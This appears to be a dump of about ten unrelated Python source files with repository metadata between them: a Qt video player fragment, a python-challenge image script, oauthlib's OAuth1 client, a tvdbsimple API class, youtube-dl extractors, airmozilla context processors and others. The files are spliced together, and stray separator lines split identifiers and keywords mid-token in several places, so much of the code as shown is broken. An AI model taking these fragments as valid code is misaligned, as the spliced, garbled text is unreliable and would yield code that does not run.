self.loaded = False
self.duration_changed = True
self.region_bar.update()
def on_pause_change(self, value):
if hasattr(self, "action_play"):
self.action_play.setIcon(QIcon(self.pixlib[["pause", "play"][int(value)]]))
def on_timeline_seek(self):
if not self.loaded:
return
try:
self.player["pause"] = True
self.player.seek(self.timeline.value() / 100.0, "absolute", "exact")
except Exception:
pass
def on_frame_next(self):
if not self.loaded:
return
self.player.frame_step()
def on_frame_prev(self):
if not self.loaded:
return
self.player.frame_back_step()
def on_5_next(self):
if not self.loaded:
return
self.player.seek(5 * self.frame_dur, "relative", "exact")
def on_5_prev(self):
if not self.loaded:
return
self.player.seek(-5 * self.frame_dur, "relative", "exact")
def on_go_start(self):
if not self.loaded:
return
self.player.seek(0, "absolute", "exact")
def on_go_end(self):
if not self.loaded:
return
self.player.seek(self.duration, "absolute", "exact")
def on_go_in(self):
if not self.loaded:
return
self.seek(self.mark_in)
def on_go_out(self):
if not self.loaded:
return
self.seek(self.mark_out or self.duration)
def on_mark_in(self, value=False):
if not self.loaded:
return
if value:
if isinstance(value, TimecodeWindow):
value = value.get_value()
self.seek(min(max(value, 0), self.duration))
self.mark_in = value
self.setFocus()
else:
self.mark_in = self.position
self.region_bar.update()
def on_mark_out(self, value=False):
if not self.loaded:
return
if value:
if isinstance(value, TimecodeWindow):
value = value.get_value()
self.seek(min(max(value, 0), self.duration))
self.mark_out = value
self.setFocus()
else:
self.mark_out = self.position
self.region_bar.update()
def on_clear_in(self):
if not self.loaded:
return
self.mark_in = 0
self.region_bar.update()
def on_clear_out(self):
if not self.loaded:
return
self.mark_out = 0
self.region_bar.update()
def on_clear_marks(self):
if not self.loaded:
return
self.mark_out = self.mark_in = 0
self.region_bar.update()
def seek(self, position):
if not self.loaded:
return
if isinstance(position, TimecodeWind
|
tdl/python-challenge
|
l12_imageEvilReal.py
|
Python
|
mit
| 3,202
| 0.010618
|
## image quickie!
## install PIL (Python Imaging Library) first. Supercool lib
import Image ## from Pil !
fImageOrig = "C:\\evil1.jpg"
im = Image.open(fImageOrig)
print im.size, im.mode
width, height = im.size
## get pixel list
lpix = list(im.getdata())
def getEvenOdd(lpix, width, height):
return getPixels(lpix, width, height, 0)
def getOddEven(lpix, width, height):
return getPixels(lpix, width, height, 1)
def getPixels(lpix, width, height, baseoffset):
thelist = []
for i in range(height):
offset = baseoffset
if (i % 6 in [3,4,5]):
offset = 1 - baseoffset
## get all "even" pixels on rows like 0,1,2, and all
## "odd" pixels on rows like 3,4,5
thelist.extend(lpix[offset + width*i : offset + width*i + width : 2])
return thelist
##l0 = getEvenOdd(lpix, width, height)
##l1 = getOddEven(lpix, width, height)
l0 = lpix[::2]
l1 = lpix[1::2]
im0 = Image.new(im.mode, (width/2, height))
im0.putdata(l0)
im0.save("c:\\ev0.jpg")
im1 = Image.new(im.mode, (width/2, height))
im1.putdata(l1)
im1.save("c:\\ev1.jpg")
def getAnXthPartHeight(lpix, width, height, startline, x=6):
l = []
print width, height, startline
for i in range(startline, height, x):
l.extend(lpix[i*width : (i+1)*width])
return l
def getAnXthPartWidth(lpix, width, height, startcol, x=8):
print width, height, st
|
artcol
return lpix[startcol::x]
magicheight = 5
listsEven = range(magicheight)
imagesEven = range(magicheight)
for i in rang
|
e(magicheight):
listsEven[i] = getAnXthPartHeight(l0, width/2, height, i, magicheight)
imagesEven[i] = Image.new(im.mode, (width/2, height/magicheight))
imagesEven[i].putdata(listsEven[i])
imagesEven[i].save("c:\\evil_even_" + str(magicheight) + "_" + str(i) + ".jpg")
listsOdd = range(magicheight)
imagesOdd = range(magicheight)
for i in range(magicheight):
listsOdd[i] = getAnXthPartHeight(l1, width/2, height, i, magicheight)
imagesOdd[i] = Image.new(im.mode, (width/2, height/magicheight))
imagesOdd[i].putdata(listsOdd[i])
imagesOdd[i].save("c:\\evil_odd_" + str(magicheight) + "_" + str(i) + ".jpg")
magicwidth = 4
for j in range(magicheight):
listsEvenJ = range(magicwidth)
imagesEvenJ = range(magicwidth)
for i in range(magicwidth):
listsEvenJ[i] = getAnXthPartWidth(listsEven[j], width/2, height, i, magicwidth)
imagesEvenJ[i] = Image.new(im.mode, ((width/2)/magicwidth, height/magicheight))
imagesEvenJ[i].putdata(listsEvenJ[i])
imagesEvenJ[i].save("c:\\evil_even_" + str(magicheight) + "_" + \
str(magicwidth) + "_" + str(i) + "_" + str(j) + ".jpg")
for j in range(magicheight):
listsOddJ = range(magicwidth)
imagesOddJ = range(magicwidth)
for i in range(magicwidth):
listsOddJ[i] = getAnXthPartWidth(listsOdd[j], width/2, height, i, magicwidth)
imagesOddJ[i] = Image.new(im.mode, ((width/2)/magicwidth, height/magicheight))
imagesOddJ[i].putdata(listsOddJ[i])
imagesOddJ[i].save("c:\\evil_odd_" + str(magicheight) + "_" + \
str(magicwidth) + "_" + str(i) + "_" + str(j) + ".jpg")
|
GeoMop/GeoMop
|
src/ModelEditor/ui/panels/__init__.py
|
Python
|
gpl-3.0
| 218
| 0
|
"""
Module with Qt widgets.
"""
from .debug_info import DebugPanelWidget
from .error_
|
tab import ErrorWidget
from .info_panel import InfoPanelPage
from .tree import TreeWidget
from .yaml_editor import YamlEdit
|
orWidget
|
davetcoleman/moveit
|
moveit_ros/planning_interface/test/python_move_group_ns.py
|
Python
|
bsd-3-clause
| 3,928
| 0.001527
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of it
|
s
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTR
|
IBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: William Baker
#
# This test is used to ensure planning with a MoveGroupInterface is
# possbile if the robot's move_group node is in a different namespace
import unittest
import numpy as np
import rospy
import rostest
import os
from moveit_ros_planning_interface._moveit_move_group_interface import MoveGroupInterface
class PythonMoveGroupNsTest(unittest.TestCase):
PLANNING_GROUP = "manipulator"
PLANNING_NS = "test_ns/"
@classmethod
def setUpClass(self):
self.group = MoveGroupInterface(self.PLANNING_GROUP, "%srobot_description"%self.PLANNING_NS, self.PLANNING_NS)
@classmethod
def tearDown(self):
pass
def check_target_setting(self, expect, *args):
if len(args) == 0:
args = [expect]
self.group.set_joint_value_target(*args)
res = self.group.get_joint_value_target()
self.assertTrue(np.all(np.asarray(res) == np.asarray(expect)),
"Setting failed for %s, values: %s" % (type(args[0]), res))
def test_target_setting(self):
n = self.group.get_variable_count()
self.check_target_setting([0.1] * n)
self.check_target_setting((0.2,) * n)
self.check_target_setting(np.zeros(n))
self.check_target_setting([0.3] * n, {name: 0.3 for name in self.group.get_active_joints()})
self.check_target_setting([0.5] + [0.3]*(n-1), "joint_1", 0.5)
def plan(self, target):
self.group.set_joint_value_target(target)
return self.group.compute_plan()
def test_validation(self):
current = np.asarray(self.group.get_current_joint_values())
plan1 = self.plan(current + 0.2)
plan2 = self.plan(current + 0.2)
# first plan should execute
self.assertTrue(self.group.execute(plan1))
# second plan should be invalid now (due to modified start point) and rejected
self.assertFalse(self.group.execute(plan2))
# newly planned trajectory should execute again
plan3 = self.plan(current)
self.assertTrue(self.group.execute(plan3))
if __name__ == '__main__':
PKGNAME = 'moveit_ros_planning_interface'
NODENAME = 'moveit_test_python_move_group'
rospy.init_node(NODENAME)
rostest.rosrun(PKGNAME, NODENAME, PythonMoveGroupNsTest)
|
mozilla/firefox-flicks
|
vendor-local/lib/python/oauthlib/oauth1/rfc5849/__init__.py
|
Python
|
bsd-3-clause
| 41,842
| 0.001793
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
"""
oauthlib.oauth1.rfc5849
~~~~~~~~~~~~~~
This module is an implementation of various logic needed
for signing and checking OAuth 1.0 RFC 5849 requests.
"""
import logging
import sys
import time
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
if sys.version_info[0] == 3:
bytes_type = bytes
else:
bytes_type = str
from oauthlib.common import Request, urlencode, generate_nonce
from oauthlib.common import generate_timestamp, to_unicode
from . import parameters, signature, utils
SIGNATURE_HMAC = "HMAC-SHA1"
SIGNATURE_RSA = "RSA-SHA1"
SIGNATURE_PLAINTEXT = "PLAINTEXT"
SIGNATURE_METHODS = (SIGNATURE_HMAC, SIGNATURE_RSA, SIGNATURE_PLAINTEXT)
SIGNATURE_TYPE_AUTH_HEADER = 'AUTH_HEADER'
SIGNATURE_TYPE_QUERY = 'QUERY'
SIGNATURE_TYPE_BODY = 'BODY'
CONTENT_TYPE_FORM_URLENCODED = 'application/x-www-form-urlencoded'
class Client(object):
"""A client used to sign OAuth 1.0 RFC 5849 requests"""
def __init__(self, client_key,
client_secret=None,
resource_owner_key=None,
resource_owner_secret=None,
callback_uri=None,
signature_method=SIGNATURE_HMAC,
signature_type=SIGNATURE_TYPE_AUTH_HEADER,
rsa_key=None, verifier=None, realm=None,
encoding='utf-8', nonce=None, timestamp=None):
# Convert to unicode using encoding if given, else assume unicode
encode = lambda x: to_unicode(x, encoding) if encoding else x
self.client_key = encode(client_key)
self.client_secret = encode(client_secret)
self.resource_owner_key = encode(resource_owner_key)
self.resource_owner_secret = encode(resource_owner_secret)
self.signature_method = encode(signature_method)
self.signature_type = encode(signature_type)
self.callback_uri = encode(callback_uri)
self.rsa_key = encode(rsa_key)
self.verifier = encode(verifier)
self.realm = encode(realm)
self.encoding = encode(encoding)
self.nonce = encode(nonce)
self.timestamp = encode(timestamp)
if self.signature_method == SIGNATURE_RSA and self.rsa_key is None:
raise ValueError('rsa_key is required when using RSA signature method.')
def get_oauth_signature(self, request):
"""Get an OAuth signature to be used in signing a request
"""
if self.signature_method == SIGNATURE_PLAINTEXT:
# fast-path
return signature.sign_plaintext(self.client_secret,
self.resource_owner_secret)
uri, headers, body = self._render(request)
collected_params = signature.collect_parameters(
uri_query=urlparse.urlparse(uri).query,
body=body,
headers=headers)
logging.debug("Collected params: {0}".format(collected_params))
normalized_params = signature.normalize_parameters(collected_params)
normalized_uri = signature.normalize_base_string_uri(request.uri)
logging.debug("Normalized params: {0}".format(normalized_params))
logging.debug("Normalized URI: {0}".format(normalized_uri))
base_string = signature.construct_base_string(request.http_method,
normalized_uri, normalized_params)
logging.debug("Base signing string: {0}".format(base_string))
if self.signature_method == SIGNATURE_HM
|
AC:
sig = signature.sign_hmac_sha1(base_string, self.client_secret,
self.resource_owner_secret)
elif self.signature_method == SIGNATURE_RSA:
sig = signature.sign_rsa_sha1(base_string, self.rsa_key)
else:
sig = signature.sign_plaintext(self.client_secret,
|
self.resource_owner_secret)
logging.debug("Signature: {0}".format(sig))
return sig
def get_oauth_params(self):
"""Get the basic OAuth parameters to be used in generating a signature.
"""
nonce = (generate_nonce()
if self.nonce is None else self.nonce)
timestamp = (generate_timestamp()
if self.timestamp is None else self.timestamp)
params = [
('oauth_nonce', nonce),
('oauth_timestamp', timestamp),
('oauth_version', '1.0'),
('oauth_signature_method', self.signature_method),
('oauth_consumer_key', self.client_key),
]
if self.resource_owner_key:
params.append(('oauth_token', self.resource_owner_key))
if self.callback_uri:
params.append(('oauth_callback', self.callback_uri))
if self.verifier:
params.append(('oauth_verifier', self.verifier))
return params
def _render(self, request, formencode=False, realm=None):
"""Render a signed request according to signature type
Returns a 3-tuple containing the request URI, headers, and body.
If the formencode argument is True and the body contains parameters, it
is escaped and returned as a valid formencoded string.
"""
# TODO what if there are body params on a header-type auth?
# TODO what if there are query params on a body-type auth?
uri, headers, body = request.uri, request.headers, request.body
# TODO: right now these prepare_* methods are very narrow in scope--they
# only affect their little thing. In some cases (for example, with
# header auth) it might be advantageous to allow these methods to touch
# other parts of the request, like the headers—so the prepare_headers
# method could also set the Content-Type header to x-www-form-urlencoded
# like the spec requires. This would be a fundamental change though, and
# I'm not sure how I feel about it.
if self.signature_type == SIGNATURE_TYPE_AUTH_HEADER:
headers = parameters.prepare_headers(request.oauth_params, request.headers, realm=realm)
elif self.signature_type == SIGNATURE_TYPE_BODY and request.decoded_body is not None:
body = parameters.prepare_form_encoded_body(request.oauth_params, request.decoded_body)
if formencode:
body = urlencode(body)
headers['Content-Type'] = 'application/x-www-form-urlencoded'
elif self.signature_type == SIGNATURE_TYPE_QUERY:
uri = parameters.prepare_request_uri_query(request.oauth_params, request.uri)
else:
raise ValueError('Unknown signature type specified.')
return uri, headers, body
def sign(self, uri, http_method='GET', body=None, headers=None, realm=None):
"""Sign a request
Signs an HTTP request with the specified parts.
Returns a 3-tuple of the signed request's URI, headers, and body.
Note that http_method is not returned as it is unaffected by the OAuth
signing process.
The body argument may be a dict, a list of 2-tuples, or a formencoded
string. The Content-Type header must be 'application/x-www-form-urlencoded'
if it is present.
If the body argument is not one of the above, it will be returned
verbatim as it is unaffected by the OAuth signing process. Attempting to
sign a request with non-formencoded data using the OAuth body signature
type is invalid and will raise an exception.
If the body does contain parameters, it will be returned as a properly-
formatted formencoded string.
All string data MUST be unicode. This includes strings inside body
dicts, for example.
"""
# normalize request data
request = Request(uri, http_method, body, headers,
encoding=self.encoding)
# sanity check
content_type = request.headers.get('Content-Type', None)
multipart = content_type and content_type.startswith('multipart/')
should_have_params = content_type == CONTENT_TYPE_FORM_URLENCODED
has_params = request.decoded_body is not None
# 3.4.1.3.1. Parameter So
|
axlt2002/script.light.imdb.ratings.update
|
resources/support/tvdbsimple/base.py
|
Python
|
gpl-3.0
| 5,912
| 0.007781
|
# -*- coding: utf-8 -*-
"""
This module implements the base class of tvdbsimple.
Handle automatically login, token creation and response basic stripping.
[See Authentication API section](https://api.thetvdb.com/swagger#!/Authentication)
"""
import json
import requests
class AuthenticationError(Exception):
"""
Authentication exception class for authentication errors
"""
pass
class APIKeyError(Exception):
"""
Missing API key exception class in case of missing api
"""
pass
class TVDB(object):
"""
Basic Authentication class for API key, login and token automatic handling functionality.
[See Authentication API section](https://api.thetvdb.com/swagger#!/Authentication)
"""
_headers = {'Content-Type': 'application/json',
'Accept': 'application/json',
'Connection': 'close'}
_BASE_PATH = ''
_URLS = {}
_BASE_URI = 'https://api.thetvdb.com'
def __init__(self, id=0, user=None, key=None):
"""
Initialize the base class.
You can provide `id` that is the item id used for url creation. You can also
provide `user`, that is the username for login.
You can also provide `key`, that is the userkey needed to
authenticate with the user, you can find it in the
[account info](http://thetvdb.com/?tab=userinfo) under account identifier.,
the language id you want to use to retrieve the info.
"""
self._ID = id
self.USER = user
"""Stores username if available"""
self.USER_KEY = key
"""Stores user-key if available"""
def _get_path(self, key):
return self._BASE_PATH + self._URLS[key]
def _get_id_path(self, key):
return self._get_path(key).format(id=self._ID)
def _get_complete_url(self, path):
return '{base_uri}/{path}'.format(base_uri=self._BASE_URI, path=path)
def _set_language(self, language):
if language:
self._headers['Accept-Language'] = language
def refresh_token(self):
"""
Refresh the current token set in the module.
Returns the new obtained valid token for the API.
"""
self._set_token_header()
response = requests.request(
|
'GET', self._get_complete_url('refresh_token'),
headers=self._headers)
response.raise_for_status()
jsn = response.json()
if 'token' in jsn:
from . import KEYS
KEYS.API_TOKEN = jsn['token']
return KEYS.API_TOKEN
return ''
def _set_token_header(self, forceNew=False):
self._headers['Authorization'] = 'Bearer ' + self.get_token(forceNew)
def get_token(self, forceNew=False):
|
"""
Get the existing token or creates it if it doesn't exist.
Returns the API token.
If `forceNew` is true the function will do a new login to retrieve the token.
"""
from . import KEYS
if not KEYS.API_TOKEN or forceNew:
if not KEYS.API_KEY:
raise APIKeyError
if hasattr(self,"USER") and hasattr(self,"USER_KEY"):
data = {"apikey": KEYS.API_KEY, "username": self.USER, "userkey": self.USER_KEY}
else:
data={"apikey": KEYS.API_KEY}
response = requests.request(
'POST', self._get_complete_url('login'),
data=json.dumps(data),
headers=self._headers)
if response.status_code == 200:
KEYS.API_TOKEN = response.json()['token']
else:
error = "Unknown error while authenticating. Check your api key or your user/userkey"
try:
error = response.json()['error']
except:
pass
raise AuthenticationError(error)
return KEYS.API_TOKEN
def _request(self, method, path, params=None, payload=None, forceNewToken=False, cleanJson = True):
self._set_token_header(forceNewToken)
url = self._get_complete_url(path)
response = requests.request(
method, url, params=params,
data=json.dumps(payload) if payload else payload,
headers=self._headers)
if response.status_code == 200:
response.encoding = 'utf-8'
jsn = response.json()
if cleanJson and 'data' in jsn:
return jsn['data']
return jsn
elif not forceNewToken:
return self._request(method=method, path=path, params=params, payload=payload, forceNewToken=True)
try:
raise Exception(response.json()['error'])
except:
#response.raise_for_status()
pass
def _GET(self, path, params=None, cleanJson = True):
return self._request('GET', path, params=params, cleanJson=cleanJson)
def _POST(self, path, params=None, payload=None, cleanJson = True):
return self._request('POST', path, params=params, payload=payload, cleanJson=cleanJson)
def _DELETE(self, path, params=None, payload=None, cleanJson = True):
return self._request('DELETE', path, params=params, payload=payload, cleanJson=cleanJson)
def _PUT(self, path, params=None, payload=None, cleanJson = True):
return self._request('PUT', path, params=params, payload=payload, cleanJson=cleanJson)
def _set_attrs_to_values(self, response={}):
"""
Set attributes to dictionary values.
- e.g.
>>> import tvdbsimple as tvdb
>>> show = tmdb.Tv(10332)
>>> response = show.info()
>>> show.title # instead of response['title']
"""
if isinstance(response, dict):
for key in response:
setattr(self, key, response[key])
|
navin-bhaskar/NewsReader-on-Linkit7688
|
config.py
|
Python
|
bsd-2-clause
| 522
| 0.017241
|
#The audio card number to be used; use "aplay -l" output to determine the card number
AUDIO_CARD_NUMBER = 1
# Define the IR/button input pin
INP_PIN = 2
# Speed with which the converted text is to be spoken
|
TTS_SPEED = 70
# Config server to spawned ot not, set to false if you do not want the config server
CONFIG_SERVER_SPAWN = True
# Name of the file where the RSS links will be stored
R
|
SS_LINKS_FILE = "links.txt"
# A temp file to indicate that the RSS list has been updated
NEW_LIST_FILE = ".changed.tmp"
|
apllicationCOM/youtube-dl-api-server
|
youtube_dl_server/youtube_dl/extractor/adobetv.py
|
Python
|
unlicense
| 4,630
| 0.001728
|
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
parse_duration,
unified_strdate,
str_to_int,
float_or_none,
ISO639Utils,
)
class AdobeTVIE(InfoExtractor):
_VALID_URL = r'https?://tv\.adobe\.com/watch/[^/]+/(?P<id>[^/]+)'
_TEST = {
'url': 'http://tv.adobe.com/watch/the-complete-picture-with-julieanne-kost/quick-tip-how-to-draw-a-circle-around-an-object-in-photoshop/',
'md5': '9bc5727bcdd55251f35ad311ca74fa1e',
'info_dict': {
'id': 'quick-tip-how-to-draw-a-circle-around-an-object-in-photoshop',
'ext': 'mp4',
'title': 'Quick Tip - How to Draw a Circle Around an Object in Photoshop',
'description': 'md5:99ec318dc909d7ba2a1f2b038f7d2311',
'thumbnail': 're:https?://.*\.jpg$',
'upload_date': '20110914',
'duration': 60,
'view_count': int,
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
player = self._parse_json(
self._search_regex(r'html5player:\s*({.+?})\s*\n', webpage, 'player'),
video_id)
title = player.get('title') or self._search_regex(
r'data-title="([^"]+)"', webpage, 'title')
description = self._og_search_description(webpage)
thumbnail = self._og_search_thumbnail(webpage)
upload_date = unified_strdate(
self._html_search_meta('datepublished', webpage, 'upload date'))
duration = parse_duration(
self._html_search_meta('duration', webpage, 'duration') or
self._search_regex(
r'Runtime:\s*(\d{2}:\d{2}:\d{2})',
webpage, 'duration', fatal=False))
view_count = str_to_int(self._search_regex(
r'<div class="views">\s*Views?:\s*([\d,.]+)\s*</div>',
webpage, 'view count'))
formats = [{
'url': source['src'],
'format_id': source.get('quality') or source['src'].split('-')[-1].split('.')[0] or None,
'tbr': source.get('bitrate'),
} for source in player['sources']]
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'upload_date': upload_date,
'duration': duration,
'view_count': view_count,
'formats': formats,
}
class AdobeTVVideoIE(InfoExtractor):
_VALID_URL = r'https?://video\.tv\.adobe\.com/v/(?P<id>\d+)'
|
_TEST = {
# From https://helpx.adobe.com/acrobat/how-to/new-experience-acrobat-dc.html?set=acrobat--get-started--essential-beginners
'url': 'https://video.tv.adobe.com/v/2456/',
'md5': '43662b577c018ad707a63766462b1e87',
'info_dict': {
'id': '24
|
56',
'ext': 'mp4',
'title': 'New experience with Acrobat DC',
'description': 'New experience with Acrobat DC',
'duration': 248.667,
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
player_params = self._parse_json(self._search_regex(
r'var\s+bridge\s*=\s*([^;]+);', webpage, 'player parameters'),
video_id)
formats = [{
'url': source['src'],
'width': source.get('width'),
'height': source.get('height'),
'tbr': source.get('bitrate'),
} for source in player_params['sources']]
# For both metadata and downloaded files the duration varies among
# formats. I just pick the max one
duration = max(filter(None, [
float_or_none(source.get('duration'), scale=1000)
for source in player_params['sources']]))
subtitles = {}
for translation in player_params.get('translations', []):
lang_id = translation.get('language_w3c') or ISO639Utils.long2short(translation['language_medium'])
if lang_id not in subtitles:
subtitles[lang_id] = []
subtitles[lang_id].append({
'url': translation['vttPath'],
'ext': 'vtt',
})
return {
'id': video_id,
'formats': formats,
'title': player_params['title'],
'description': self._og_search_description(webpage),
'duration': duration,
'subtitles': subtitles,
}
|
lcamacho/airmozilla
|
airmozilla/main/context_processors.py
|
Python
|
bsd-3-clause
| 12,078
| 0
|
import datetime
from django.conf import settings
from django.db.models import Q
from django.utils import timezone
from django.core.cache import cache
from funfactory.urlresolvers import reverse
from airmozilla.main.models import (
Event,
Channel,
EventHitStats,
most_recent_event
)
from airmozilla.main.views import is_contributor
from airmozilla.search.forms import SearchForm
from airmozilla.staticpages.models import StaticPage
def nav_bar(request):
def get_nav_bar():
items = [
('Home', reverse('main:home'), 'home', ''),
('About', '/about/', '/about', ''),
('Channels', reverse('main:channels'), 'channels', ''),
('Calendar', reverse('main:calendar'), 'calendar', ''),
]
if not request.user.is_staff:
items.append(
('Tag Cloud', reverse('main:tag_cloud'), 'tag_cloud', '')
)
items.append(
('Starred', reverse('starred:home'), 'starred', '')
)
unfinished_events = 0
if request.user.is_active:
unfinished_events = Event.objects.filter(
creator=request.user,
status=Event.STATUS_INITIATED,
upload__isnull=False,
).count()
if settings.USE_NEW_UPLOADER:
items.append(
('New/Upload', reverse('new:home'), 'new', ''),
)
else:
items.append(
('Requests', reverse('suggest:start'), 'suggest', ''),
)
if request.user.is_staff:
items.append(
('Management', reverse('manage:events'), '', ''),
)
if not settings.BROWSERID_DISABLED:
items.append(
('Sign out', '/browserid/logout/', '', 'browserid-logout'),
)
return {'items': items, 'unfinished_events': unfinished_events}
# The reason for making this a closure is because this stuff is not
# needed on every single template render. Only the main pages where
# there is a nav bar at all.
return {'nav_bar': get_nav_bar}
def dev(request):
return {
'DEV': settings.DEV,
'DEBUG': settings.DEBUG,
'BROWSERID_DISABLED': settings.BROWSERID_DISABLED,
}
def search_form(request):
return {'search_form': SearchForm(request.GET)}
def base(request):
def get_feed_data():
feed_privacy = _get_feed_privacy(request.user)
if getattr(request, 'channels', None):
channels = request.channels
else:
channels = Channel.objects.filter(
slug=settings.DEFAULT_CHANNEL_SLUG
)
if settings.DEFAULT_CHANNEL_SLUG in [x.slug for x in channels]:
title = 'Air Mozilla RSS'
url = reverse('main:feed', args=(feed_privacy,))
else:
_channel = channels[0]
title = 'Air Mozilla - %s - RSS' % _channel.name
url = reverse(
'main:channel_feed',
args=(_channel.slug, feed_privacy)
)
return {
'title': title,
'url': url,
}
return {
|
# used for things like {% if event.attr == Event.ATTR1 %}
'Event': Event,
'get_feed_data': get_feed_data,
}
def sidebar(request):
#
|
none of this is relevant if you're in certain URLs
def get_sidebar():
data = {}
if not getattr(request, 'show_sidebar', True):
return data
# if viewing a specific page is limited by channel, apply that
# filtering here too
if getattr(request, 'channels', None):
channels = request.channels
else:
channels = Channel.objects.filter(
slug=settings.DEFAULT_CHANNEL_SLUG
)
if settings.DEFAULT_CHANNEL_SLUG in [x.slug for x in channels]:
sidebar_channel = settings.DEFAULT_CHANNEL_SLUG
else:
_channel = channels[0]
sidebar_channel = _channel.slug
data['upcoming'] = get_upcoming_events(channels, request.user)
data['featured'] = get_featured_events(channels, request.user)
data['sidebar_top'] = None
data['sidebar_bottom'] = None
sidebar_urls_q = (
Q(url='sidebar_top_%s' % sidebar_channel) |
Q(url='sidebar_bottom_%s' % sidebar_channel) |
Q(url='sidebar_top_*') |
Q(url='sidebar_bottom_*')
)
# to avoid having to do 2 queries, make a combined one
# set it up with an iterator
for page in StaticPage.objects.filter(sidebar_urls_q):
if page.url.startswith('sidebar_top_'):
data['sidebar_top'] = page
elif page.url.startswith('sidebar_bottom_'):
data['sidebar_bottom'] = page
return data
# Make this context processor return a closure so it's explicit
# from the template if you need its data.
return {'get_sidebar': get_sidebar}
def get_upcoming_events(channels, user,
length=settings.UPCOMING_SIDEBAR_COUNT):
"""return a queryset of upcoming events"""
anonymous = True
contributor = False
if user.is_active:
anonymous = False
if is_contributor(user):
contributor = True
cache_key = 'upcoming_events_%s_%s' % (int(anonymous), int(contributor))
cache_key += ','.join(str(x.id) for x in channels)
event = most_recent_event()
if event:
cache_key += str(event.modified.microsecond)
upcoming = cache.get(cache_key)
if upcoming is None:
upcoming = _get_upcoming_events(channels, anonymous, contributor)
upcoming = upcoming[:length]
cache.set(cache_key, upcoming, 60 * 60)
return upcoming
def _get_upcoming_events(channels, anonymous, contributor):
"""do the heavy lifting of getting the featured events"""
upcoming = Event.objects.upcoming().order_by('start_time')
upcoming = upcoming.filter(channels__in=channels).distinct()
upcoming = upcoming.select_related('picture')
if anonymous:
upcoming = upcoming.exclude(privacy=Event.PRIVACY_COMPANY)
elif contributor:
upcoming = upcoming.filter(privacy=Event.PRIVACY_PUBLIC)
return upcoming
def get_featured_events(
channels,
user,
length=settings.FEATURED_SIDEBAR_COUNT
):
"""return a list of events that are sorted by their score"""
anonymous = True
contributor = False
if user.is_active:
anonymous = False
if is_contributor(user):
contributor = True
cache_key = 'featured_events_%s_%s' % (int(anonymous), int(contributor))
if channels:
cache_key += ','.join(str(x.id) for x in channels)
event = most_recent_event()
if event:
cache_key += str(event.modified.microsecond)
featured = cache.get(cache_key)
if featured is None:
featured = _get_featured_events(channels, anonymous, contributor)
featured = featured[:length]
cache.set(cache_key, featured, 60 * 60)
# Sadly, in Django when you do a left outer join on a many-to-many
# table you get repeats and you can't fix that by adding a simple
# `distinct` on the first field.
# In django, if you do `myqueryset.distinct('id')` it requires
# that that's also something you order by.
# In pure Postgresql you can do this:
# SELECT
# DISTINCT main_eventhitstats.id as id,
# (some formula) AS score,
# ...
# FROM ...
# INNER JOIN ...
# INNER JOIN ...
# ORDER BY score DESC
# LIMIT 5;
#
# But you can't do that with Django.
# So we have to manually de-dupe. Hopefully we can alleviate this
# problem altogether when we start doing aggregates where you have
# many repeated EventHitStats *per* event and you need to look at
# their total score across multiple vidly shortcodes.
events = []
for each in featured:
if each.event not in events:
events.append(each.event)
r
|
pdp10/sbpipe
|
sbpipe/utils/dependencies.py
|
Python
|
mit
| 3,141
| 0.001273
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Piero Dalle Pezze
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import subprocess
import logging
logger = logging.getLogger('sbpipe')
def which(cmd_name):
"""
Utility equivalent to `which` in GNU/Linux OS.
:param cmd_name: a command name
:return: return the command name with absolute path if this exists, or None
"""
for path in os.environ["PATH"].split(os.pathsep):
if os.path.exists(os.path.join(path, cmd_n
|
ame)):
return os.path.join(path, cmd_name)
